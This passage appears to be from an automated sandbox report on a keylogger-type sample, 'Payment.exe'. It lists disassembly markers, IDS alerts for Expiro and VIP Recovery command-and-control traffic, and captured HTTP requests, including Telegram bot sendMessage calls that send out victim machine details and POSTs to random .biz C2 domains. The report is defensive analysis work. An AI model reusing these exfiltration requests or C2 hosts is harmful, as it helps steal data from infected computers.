Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AD6A3h	8_2_070AD3D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A5E8Ch	8_2_070A5BE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AF6CBh	8_2_070AF3F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AC8DBh	8_2_070AC608
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AE903h	8_2_070AE630
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A1CFCh	8_2_070A1A50
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AAD4Bh	8_2_070AAA78
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A4D2Ch	8_2_070A4A80
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A712Ch	8_2_070A6E80
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A2154h	8_2_070A1EA8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070ACD73h	8_2_070ACAA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AED9Bh	8_2_070AEAC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A5184h	8_2_070A4ED8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A7584h	8_2_070A72D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070ADFD3h	8_2_070ADD00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A0FF4h	8_2_070A0D48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AA41Bh	8_2_070AA148
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AC443h	8_2_070AC170
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AE46Bh	8_2_070AE198
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A144Ch	8_2_070A11A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AA8B3h	8_2_070AA5E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A18A4h	8_2_070A15F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A32B4h	8_2_070A3008
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A62E4h	8_2_070A6038
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A02ECh	8_2_070A0040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070ABB13h	8_2_070AB840
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070ADB3Bh	8_2_070AD868
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A370Ch	8_2_070A3460
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A0744h	8_2_070A0498
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A673Ch	8_2_070A6490
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AFB63h	8_2_070AF890
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A3B64h	8_2_070A38B8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A9F83h	8_2_070A9CB0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070ABFABh	8_2_070ABCD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A6B96h	8_2_070A68E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A0B9Ch	8_2_070A08F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C6714h	8_2_071C6418
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CE434h	8_2_071CE138
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C4CF4h	8_2_071C4980
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C53D4h	8_2_071C50D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CB414h	8_2_071CB118
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C9C04h	8_2_071C9908
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CE904h	8_2_071CE608
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C9734h	8_2_071C9438
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C0C03h	8_2_071C0930
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C22FBh	8_2_071C2028
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C7F24h	8_2_071C7C28
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CCC24h	8_2_071CC928
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C39F3h	8_2_071C3720
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C2C2Bh	8_2_071C2958
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C7A54h	8_2_071C7758
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CC754h	8_2_071CC458
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C4323h	8_2_071C4050
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C6244h	8_2_071C5F48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CAF44h	8_2_071CAC48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CFC44h	8_2_071CF948
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C0313h	8_2_071C0040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C5D74h	8_2_071C5A78
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CAA74h	8_2_071CA778
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CF774h	8_2_071CF478
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C9264h	8_2_071C8F68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CDF64h	8_2_071CDC68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C1533h	8_2_071C1260
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C8D94h	8_2_071C8A98
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CDA94h	8_2_071CD798
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C1E63h	8_2_071C1B90
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C355Ch	8_2_071C3288
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C7584h	8_2_071C7288
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CC284h	8_2_071CBF88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C3E8Bh	8_2_071C3BB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C70B4h	8_2_071C6DB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CBDB4h	8_2_071CBAB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C58A4h	8_2_071C55A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CA5A4h	8_2_071CA2A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CF2A5h	8_2_071CEFA8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C0783h	8_2_071C04D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CA0D4h	8_2_071C9DD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CEDD4h	8_2_071CEAD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C109Bh	8_2_071C0DC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C88C4h	8_2_071C85C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CD5C4h	8_2_071CD2C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C2793h	8_2_071C24C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C19CBh	8_2_071C16F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C83F4h	8_2_071C80F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CD0F4h	8_2_071CCDF8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C30C3h	8_2_071C2DF0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C47BBh	8_2_071C44E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071C6BE4h	8_2_071C68E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 071CB8E4h	8_2_071CB5E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 07260CDCh	8_2_072609E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0726033Ch	8_2_07260040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0726080Ch	8_2_07260510
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_0731FBB0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_0731FBA2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 073332DEh	8_2_07332EC0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 07332B94h	8_2_073328E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733F5D4h	8_2_0733F328
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733FA2Ch	8_2_0733F780
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733E8CCh	8_2_0733E620
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 073332DEh	8_2_0733320C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_07330273
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733ED24h	8_2_0733EA78
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733F17Ch	8_2_0733EED0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733DBC4h	8_2_0733D918
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 07330F50h	8_2_07330D70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733193Bh	8_2_07330D70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733E01Ch	8_2_0733DD70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733E474h	8_2_0733E1C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733CEBCh	8_2_0733CC10
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733D314h	8_2_0733D068
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0733D76Ch	8_2_0733D4C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_073C3168
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_073C3159
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	18_2_032B8F2A
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 08B9C7D7h	18_2_08B9C221
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 08B9C7D7h	18_2_08B9C261
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 037CFB20h	39_2_037CFB6F
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 037CFB20h	39_2_037CFBE1
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 037CFB20h	39_2_037CF983
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BECCCh	39_2_062BEA20
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062B32DEh	39_2_062B320C
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BF124h	39_2_062BEE78
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062B32DEh	39_2_062B2EBA
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	39_2_062B0280
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062B32DEh	39_2_062B2EC0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BF57Ch	39_2_062BF2D0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BF9D4h	39_2_062BF728
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BFE2Ch	39_2_062BFB80
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BD2BCh	39_2_062BD010
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BD714h	39_2_062BD468
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062B2B94h	39_2_062B28E0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BDB6Ch	39_2_062BD8C0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BDFC4h	39_2_062BDD18
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062B0F50h	39_2_062B0D70
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062B193Bh	39_2_062B0D70
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BE41Ch	39_2_062BE170
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 4x nop then jmp 062BE874h	39_2_062BE5C8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:53810 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49691 -> 3.229.117.57:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49765 -> 54.169.144.97:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:54423 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53205 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53023 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2860948 - Severity 1 - ETPRO MALWARE VIP Recovery Keylogger Checkin via Telegram (GET) : 192.168.2.8:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49753 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2860948 - Severity 1 - ETPRO MALWARE VIP Recovery Keylogger Checkin via Telegram (GET) : 192.168.2.8:49753 -> 149.154.167.220:443

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: unknown

Network traffic detected: DNS query count 52

Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2010/04/2025%20/%2023:15:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2011/04/2025%20/%2009:21:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49689 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49745 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49729 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.8:49683
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.8:49683
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49698 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49702 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49747 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.8:49774
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.8:49774
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.8:49769
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.8:49787
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.8:49769
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.8:49787
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.8:49709
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49731 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.8:49709
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.8:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.8:49779
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.8:49758
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.8:49758
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.8:49782
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.8:49782
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.8:49691
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.8:49691
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49735 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49740 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.8:49776
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.8:49776
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.8:49821
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.8:49821
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49695 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49748 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49700 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49686 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /uoiag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /tmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
